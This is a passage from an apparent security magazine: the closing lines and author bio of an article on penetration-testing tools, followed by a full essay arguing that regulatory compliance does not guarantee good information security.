will get the most benefit from Cobalt Strike 3.0 because of Beacon and its social engineering tool set.
Whichever tool you use, wield it like a sword, so that the network defenders can develop their
defensive skills.

About the author:

TOM UPDEGROVE
ITC expert in the Philadelphia/DC Metro area. He is CEO of Philadelphia-based Internetwork Service
& Security, where he manages a number of business networks and provides advice on network design,
workflow, performance optimization and security. He is also an EC-Council certified trainer and conducts
classes in Ethical Hacking in the Washington DC area. Tom has recently been featured in a video series,
"Cyber Kung Fu", created with his partner Larry Greenblatt. It has been released on Secure Ninja TV and
shows the concepts and tools that the pros use for Pen Testing:
https://www.youtube.com/watch?v=8R3QjNXDaVA. He has also presented security lectures at Hacker
Halted and Sharkfest in 2014.

Impact of compliance on information security
by Ayo Tayo Balogun

"Target was certified as meeting the standard for the payment card industry in September 2013.
Nonetheless, we suffered a data breach." Target Chairman, President, and Chief Executive Officer
Gregg Steinhafel

In Information Security there is a plethora of laws and regulations: Sarbanes-Oxley Act (SOX);
Payment Card Industry Data Security Standard (PCI DSS); Gramm-Leach-Bliley Act (GLB); Electronic
Fund Transfer Act, Regulation E (EFTA); Customs-Trade Partnership Against Terrorism (C-TPAT); Free and
Secure Trade Program (FAST); Children's Online Privacy Protection Act (COPPA); Fair and Accurate
Credit Transaction Act (FACTA), including the Red Flags Rule; Federal Rules of Civil Procedure (FRCP).
Industry-specific guidelines and requirements include: Federal Information Security Management Act
(FISMA); North American Electric Reliability Corp. (NERC) standards; Title 21 of the Code of Federal
Regulations (21 CFR Part 11) Electronic Records; Health Insurance Portability and Accountability Act
(HIPAA); the Health Information Technology for Economic and Clinical Health Act (HITECH); Patient
Safety and Quality Improvement Act (PSQIA, Patient Safety Rule); H.R. 2868: the Chemical Facility
Anti-Terrorism Standards Regulation. How many of these regulations, laws and guidelines a business
needs to adhere to depends on what part of the world it operates from (or is domiciled in) and on the
sector it works in.

Laws, Regulations, Standards and Guidelines are very familiar words in Information Security, and the
word that ties them all together is Compliance. Compliance, generally speaking, is the basis for audits,
and it is the native language that the Executive Management of any enterprise understands. The great
debate for us, however, is: does compliance really translate into good security?

What is Good Information Security? According to Malcolm Carrie, head of global strategy and
architecture at BAE Systems, good information security covers people, process and technology.
It creates the understanding, at all levels of the organization, that finding the appropriate balance
of availability, integrity and confidentiality requires a full appreciation of the risks.

The rush for Compliance has more or less taken center stage in recent times, and many businesses
(and the people driving them) forget, or are unaware, that Information Security needs should be the
primary driver of compliance criteria and metrics; nobody would erect the compliance barrier for its own
sake. Good security requires appropriate processes, practices and technologies to be implemented.
In 2014, the FBI warned the healthcare industry that its data was not secure. The biggest vulnerability
was the belief of healthcare IT professionals that their existing perimeter defenses and compliance
strategies were working, when the data clearly said otherwise.

Many organizations focus on compliance and have reams of paper to show for it: policies, procedures
and training records. Several of them buy compliance-in-a-box kits, and because the focus is on
compliance rather than security, much of the kit's content still has the blank spots where the name of
the organization should have been inserted. Many of the organizations that do eventually complete
their documentation never incorporate it into the corresponding process. And because a compliance
assessment may consist mainly of answering hundreds of questions in an assessment tool, or of
discussions with consultants, many businesses will maintain that the security described in their policies
and procedures is really in place. They might even believe it themselves!

The importance of compliance cannot be overemphasized, but true Information Security goes well
beyond ticking boxes and answering a few generic questions a consultant has prepared. The goal of
a compliance program is to satisfy externally imposed requirements, and those requirements may or may
not support an effective security program. The fact that a company has been certified compliant does
not guarantee that it is secure, and some of the obligations it fulfils may contribute nothing to security.
For a business that can afford it, building an in-house IT security team is probably the best route; for
one that cannot, having a knowledgeable consultant review the business process, advise, and help
implement appropriate security solutions is the way to go.

Whatever sector a business operates in, management needs to know that attackers will always look for
loopholes, and unless the business implements a comprehensive security program and remains eternally
vigilant, attackers will find the loopholes they want, whether by exploiting the OS, the infrastructure,
the firmware, the process or the people. Risk analysis is also a critical success factor in information
security: a business should determine how much risk it is exposed to, classify that risk appropriately,
and plan accordingly. Risk analysis should be done as regularly as practicable so that no part of the
business process is left out.

Ensuring that the IT security team is knowledgeable and dedicated is another requirement that must be
addressed. One can never know how secure a system truly is until it has been tested. The IT security
team (complementing the testing done by external consultants) needs to conduct penetration tests
routinely, covering every facet of the business process, not with the intention of achieving regulatory
compliance but with the objective of determining the security posture of the business, so that any
needed corrective measures can be applied before the vulnerabilities are exploited by attackers.

About the author:

AYO TAYO BALOGUN
Information Security Analyst with Technology Support and Management experience. He's a serial
contributor and beta tester for online IT Security publications. Ayo currently works as Head of
Enterprise Security at SystemSpecs Nigeria.
